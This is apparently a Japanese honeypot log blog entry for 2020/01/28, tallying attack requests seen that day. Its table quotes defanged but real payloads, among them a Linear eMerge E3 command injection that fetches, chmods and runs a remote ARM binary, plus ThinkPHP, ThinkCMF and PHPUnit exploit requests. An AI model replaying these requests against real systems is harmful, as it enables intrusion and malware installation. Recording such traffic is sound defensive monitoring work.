23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(317日目)

2020/01/28(火)

トータルは279件でした。

ハンティングログは以下です。

62.86.6[.]98 wget hxxp[:]//switchnets[.]net/hoho.arm7

www.virustotal.com
www.virustotal.com

件数 概要 リクエス
158 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
57 アクセス GET /
23 調査 GET /script
2 NMAPによるスキャン POST /sdk
2 調査 GET /user/register/
2 アクセス GET /favicon.ico
2 NMAPによるスキャン GET /evox/about
2 phpMyAdminの調査 GET /admin-scripts.asp
2 Telerik Web UIの脆弱性を狙った通信 GET /Telerik.Web.UI.WebResource.axd?type=rau
2 D-Linkルータの脆弱性の調査 GET /HNAP1
1 PHPUnit脆弱性(CVE-2017-9841)を狙った通信 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
1 Spring Data Commonsの脆弱性を狙った通信 POST /users?page=&size=5
1 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
1 調査 OPTIONS /
1 不正中継の調査 HEAD hxxp[:]//123.125.114.144/
1 不正中継の調査 HEAD hxxp[:]//112.124.42.80:63435/
1 不正中継の調査 GET hxxp[:]//www.123cha.com/
1 stalkerportalの調査 GET /stalker_portal/server/adm/users/users-list-json
1 stalkerportalの調査 GET /stalker_portal/server/adm/tv-channels/iptv-list-json
1 Solrの調査 GET /solr/admin/info/system?wt=json
1 クローリング GET /robots.txt
1 NMAPによるスキャンNMAPによるスキャン GET /nmaplowercheck1580213264
1 NMAPによるスキャン GET /nmaplowercheck1580204063
1 調査 GET /is_test
1 ThinkPHPの脆弱性を狙った通信 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP
1 Linear eMerge E3の脆弱性を狙った通信 GET /card_scan_decoder.php?No=30&door=%60wget%20hxxp[:]//switchnets.net/hoho.arm7;%20chmod%20777%20hoho.arm7;%20./hoho.arm7%20linear%60
1 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
1 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
1 NMAPによるスキャン GET /NmapUpperCheck1580213264
1 NMAPによるスキャン GET /NmapUpperCheck1580204063
1 NMAPによるスキャン GET /Nmap/folder/check1580213264
1 NMAPによるスキャン GET /Nmap/folder/check1580204063
1 ThinkCMFの脆弱性を狙った通信 GET /?a=fetch&content=die(@md5(HelloThinkCMF))
1 リモートデバッグの調査 GET /?XDEBUG_SESSION_START=phpstorm
1 不正中継の試み CONNECT www.ipip.net:443
1 不正中継の試み CONNECT www.baidu.com:443
1 不正中継の試み CONNECT cn.bing.com:443